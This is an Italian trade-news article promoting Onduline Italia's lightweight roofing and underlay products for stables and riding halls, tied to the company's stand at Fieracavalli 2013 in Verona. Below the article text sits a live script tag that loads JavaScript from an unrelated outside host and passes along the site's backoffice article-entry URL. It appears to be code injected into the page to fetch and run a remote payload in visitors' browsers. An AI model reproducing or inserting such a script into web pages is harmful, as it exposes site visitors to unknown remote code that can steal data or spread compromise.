1. Home
  2. Notizie e Mercato
  3. Onduline Italia, protagonista a Fieracavalli

Onduline Italia, protagonista a Fieracavalli

Sistema tetto di
5/5
votato da 1 persone
La migliore soluzione per ogni tipo di copertura nelle stalle e nei maneggi: Onduline Italia sarà presente alla fiera di Verona (7-10 novembre 2013)


Onduline Italia parteciperà alla 115° edizione di Fieracavalli a Verona dal 7 al 10 novembre 2013. Con un numero di visitatori in costante ascesa (lo scorso anno sono stati registrati 156 mila visitatori da 75 Paesi), la manifestazione di Verona si conferma un appuntamento irrinunciabile per chi ama i cavalli e per chi opera nel settore.

Onduline sarà presente con uno spazio espositivo nell’Area scoperta, Padiglione 4, stand 25, in cui si potrà ammirare e apprezzare le straordinarie proprietà dei prodotti ideali per la copertura di stalle, box, maneggi e outdoor. L’eccellente qualità che da sempre contraddistingue i prodotti Onduline, si coniuga con un’estrema versatilità di applicazione anche nel settore equestre: gli indiscussi vantaggi in termini di facilità di installazione, resistenza alla corrosione, elevata resistenza meccanica, isolamento acustico e impermeabilità fanno di Onduline un partner di eccellenza per la realizzazione dei tetti di stalle, box, scuderie e maneggi, sia nel caso di nuove costruzioni che per le ristrutturazioni.

Molti allevatori hanno apprezzato i grandi vantaggi dei prodotti Onduline in termini di isolamento acustico e impermeabilizzazione: in caso di pioggia battente e forti temporali, il rumore è attutito in maniera considerevole, assicurando agli animali un ambiente confortevole, silenzioso e perfettamente asciutto. Grazie alla sua natura fibrosa, i prodotti Onduline vantano uno dei migliori coefficienti  di isolamento termico e soprattutto di assorbimento acustico rispetto a prodotti di pari spessore.
 
Non meno rilevante per l’impiego nel settore dell’allevamento è la resistenza dei prodotti Onduline contro la corrosione dovuta all’azione di agenti chimici, anche quelli particolarmente aggressivi presenti negli ambienti agricoli. I prodotti Onduline, grazie alla loro specifica composizione e all’innovativo processo di produzione, sono resistenti alla maggior parte delle sostanze chimiche e sono garantite contro la corrosione.

Inoltre, laddove l’aspetto estetico assume un valore fondamentale, le tegole fibrobituminose Onduvilla costituiscono la soluzione ideale: costituiscono infatti un sistema tetto completo, che offre affidabilità, impermeabilizzazione, comfort termico ed acustico, con un tocco di originalità. Le tegole Onduvilla vantano un attraente stile mediterraneo; sono disponibili in 7 colori che riproducono i classici toni delle coperture in laterizio e grazie alla tecnologia 3D, che riproduce una sfumatura orizzontale su ogni elemento, si crea un’ombreggiatura che conferisce alla copertura un effetto ancora più naturale.

Sia che parliamo di nuove costruzioni che di interventi di ristrutturazione, Onduline offre soluzioni efficienti, affidabili ed economicamente convenienti. Le soluzioni per copertura e sottocopertura Onduline  sono  veloci e semplici da installare in tutta sicurezza. La loro leggerezza è un elevato valore aggiunto che le rende ideali per essere applicate in innumerevoli applicazioni e su tutti i tipi di strutture.

Completano la gamma di Onduline i Sistemi da Sottocopertura Onduline che offrono soluzioni definitive per risolvere i problemi di infiltrazioni, umidità e durata delle coperture. I Sistemi da Sottocopertura Onduline permettono di realizzare manti di copertura traspiranti, isolati, ventilati e perfettamente impermeabilizzati. Le lastre da sottocopertura Onduline sono realizzate a base di fibre organiche bitumate, resinate e colorate nella massa e grazie alla loro estrema leggerezza e flessibilità costituiscono una soluzione pratica, economica ed efficace.

Tutti i prodotti da copertura Onduline sono garantiti da 60 anni di esperienza e successi industriali del Gruppo Onduline nel settore delle coperture leggere e sottocoperture. Onduline Italia è la filiale italiana del Gruppo Onduline; con il suo sito produttivo dislocato ad Altopascio (LU) gioca un ruolo strategico all’interno del Gruppo grazie alla produzione di Onduvilla e Fondaline per tutto il mercato mondiale. Onduline Italia commercializza mediante la sua selezionata rete di rivenditori i prodotti Onduline su tutto il territorio nazionale.

<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2013-10-10&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.37722297940665506" type="text/javascript"></script>